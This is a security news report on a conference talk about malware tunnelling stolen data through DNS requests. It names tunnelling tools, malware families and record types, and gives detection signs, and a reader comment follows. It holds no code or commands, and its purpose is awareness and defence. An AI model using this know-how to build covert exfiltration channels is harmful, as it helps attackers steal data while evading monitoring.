CANCUN–Attackers have long used distributed denial of service attacks to knock domain-name servers offline but over the last several months malware creators have taken to using DNS requests to tunnel stolen data.

Jaime Blasco, vice president and chief scientist at AlienVault, showed a handful of real malware samples that are using this technique at the Kaspersky Lab Security Analyst Summit Tuesday.

Blasco, who’s identified suspicious domains before, took the crowd through the motions by discussing some tools to use: NSTX, OzymanDNS, Iodine and perhaps the best known, DNScat. The apps allow users to upload files, run shells, and powershell scripts to download other payloads to use within attacks.

For the attack, Blasco described how there has to be an upstream channel which has a fully qualified domain name (FQDN) that has a minimum label length of 63 octets and a maximum domain length of 255 octets. The downstream channel can store a handful of different files in the: TXT records, CNAME records, NULL records and on occasion AAAA records.

As part of an experiment Blasco and company found 50 million files that contained traffic, threw it into a parser and found that many malware samples store a URL in a TXT file and tell it which piece of spyware or malware to deploy.

“There’s a bunch of software that are using DNS in a weird way,” Blasco said.

One of the types of malware they found, FeederBot, was using base64 to encode and had an RC4 encrypted payload. Others used base64 and XOR.

Blasco also stumbled upon FrameworkPOS, a fairly recent POS malware variant that was curiously spotted using DNS, although he believes the creators were either testing it out to allow DNS or had access to a company that used it. Morto, a worm that’s been around for a while and PlugX, a remote administration tool that’s existed in some incarnation since 2008, but has been making a return as of late, also turned up.

Blasco said that since outbound DNS is usually allowed on corporate networks, many attackers have used it and avoided detection with a simple network protector like MyDLP. Anomalies in DNS traffic, like large content in TXT or NULL records, or a spike in DNS queries, or queries with long domains and subdomains are signs that something fishy might be afoot with a system’s DNS requests, he said.

Categories: Malware, Security Analyst Summit, Vulnerabilities, Web Security

Comments (3)

  1. Marc

    The fact that DNS can be seen as a connectionless transport protocol pops up, since the 90’s (notably : download code to remove region code of DVD’s) and regularly.
    It is by no ways new. But it always surprises me how surprised the audiences are when shown what is possible if the DNS “channel” is open.
    It was the subject of my own talk @ Hacktivity 2014 :

    The references in the above article require a special DNS service, knowledgeable of the session and presentation layer. In my own presentation I chose to focus on a more static approach, with a standard (Bind) name server on the Internet side. Check the slides to see how data leakage, file transfer in and out is as easy as 1 2 3.
    And remediation is addressed as well.

Comments are closed.